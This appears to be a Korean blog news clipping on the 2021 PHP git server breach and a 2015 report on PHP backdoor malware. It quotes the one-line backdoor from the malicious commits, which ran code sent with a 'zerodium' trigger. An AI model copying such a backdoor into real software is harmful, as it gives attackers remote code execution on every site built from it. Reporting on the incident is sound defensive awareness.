Have a Yoonvely Day :D

Sin prisa pero sin pausa

이상다반사

News Clipping

[News Clipping] 2021. 04. 1주차

yoonvely 2021. 6. 29. 23:12
728x90

Main News : 또 다른 대형 공급망 공격 될 뻔한 PHP 깃 서버 침해 사건

 

널리 사용되는 프로그래밍 언어인 PHP의 깃 서버가 해킹당함

(공격자들이 서버에 침투한 뒤 코드 베이스에 백도어를 심어둔 것 발견)

--> PHP로 만들어진 모든 애플리케이션들이 감염되는 사태가 발생할 뻔

php-src 리포지터리에 두개의 악성 커밋이 삽입됨,

삽입자의 계정은 PHP 유명 개발자들인 Nikita Popov와 Rasmus Lerdorf.

이 커밋들 -> 소규모 타이포그래피 오류 수정을 위한 것처럼 위장. 실상은 원격 코드 실행을 가능케 해주는 백도어

아직 조사 진행중, Popov : "깃에다 인프라를 유지하는 것이 불필요한 위험 감수로 보인다",

"git.php.net 서버의 서비스를 중단시키고 모든 코드를 깃허브에 곧바로 업로드할 것"

지금까지 깃허브는 '미러 서버'로서만 유지되어 왔지만, 이제부터는 PHP 생태계의 중요 거점.

두 가지 악성 커밋에서 동일한 코드 행 발견

convert_to_string(enc); if (strstr(Z_STRVAL_P(enc), "zerodium")) { zend_try { zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");

 

이번 사건은 최근 유행하는 '공급망 공격'의 또 다른 시도로 분석됨.

PHP의 코드가 제공되는 서버에 감염된 코드를 심어둠으로써, 개발자들이 이 서버로부터 코드를 가져다 쓸 때 자동으로 감염된 애플리케이션과 서비스가 생성되도록 누군가 유도했기 때문.

누군가 감염된 코드로 웹사이트를 만들었다면,

공격자들은 백도어를 통해 침투해 악성 코드를 원하는 대로 실시할 수 있었음.

 

News Tracking : 지난해 ‘PHP 백도어’ 취약점 노리는 악성코드 기승(2015.02.27)

 

지난해 ‘PHP 백도어’ 취약점 노리는 악성코드 기승

지난해 하반기 한국에서는 43만 5천종의 악성코드가 발견됐으며, 이중 PHP 백도어 취약점을 공격하는 악성코드가 6만 5천여종이었고 6만여종은 사용자 입력정보 탈취기능의 시오톱(Shiotob)인 것으

www.boannews.com

포티넷 보안전략가 Derek Manky : 최근 악성코드는 랜섬웨어보다는 블라스트웨어가 더 위협적

(공격자들이 필요한 정보를 빼내고 시스템을 파괴해 버리기 때문)

포티넷 보안위협 보고서 - 지난해 하반기 한국에서 43만 5천종의 악성코드 발견, 이중 PHP 백도어 취약점을 공격하는 악성코드 6만 5천여종, 6만여종은 사용자 입력번호 탈취기능의 시오톱(Shiotob)

700만건의 해킹 중 쉘쇼크 140만건, 200만개 버전의 봇넷이 기승.

데릭 맨키 : "한국에서는 이러한 공격들이 한꺼번에 나타나는 것이 아니라 돌아가면서 발생.

특정 웹사이트가 악성코드에 감염되면 폭발적으로 확산되는 경우도 특징적.

또한, 한국의 해킹 시도 중 쉘쇼크가 모든 해킹 중 19% 차지, 전통적인 컨피커 봇넷이 점점 증가하는 추세로 분석됐다."

 


PHP의 주요 인프라였던 공식 깃 서버에서 침해 사건이 발생한것도 모자라 아직 밝혀지지는 않았지만 유명 개발자들의 계정으로 악성 백도어를 심어두려고 했던 치밀함까지 보면서 해킹 기법이 나날이 발전하고 있다고 생각이 든다. PHP의 인프라를 공략하는 공급망 공격 시도가 2019년에도 발생한 적이 있다는데, 그 당시에 PHP 측은 모든 웹사이트들을 일시적으로 폐쇄시켜야만 했고, 당시 기준 6개월 내에 해당 패키지를 다운로드 받았던 모든 개발자들에게 새 패키지를 다운받으라고 경고하기도 했다고 한다. 개인의 규모보다 훨씬 큰 대형 공급망 공격으로 인해 많은 사람들이 피해를 입지 않았으면 좋겠다. 사건 수사도 제대로 하고 백도어에 대한 부분도 경각심을 더 키워야 하겠다.

'News Clipping' 카테고리의 다른 글

[News Clipping] 2021. 04. 4주차  (0) 2021.07.02
[News Clipping] 2021. 04. 3주차  (0) 2021.07.02
[News Clipping] 2021. 04. 2주차  (0) 2021.07.02
[News Clipping] 2021. 03. 4주차  (0) 2021.06.29
[News Clipping] 2021. 03. 3주차  (0) 2021.06.29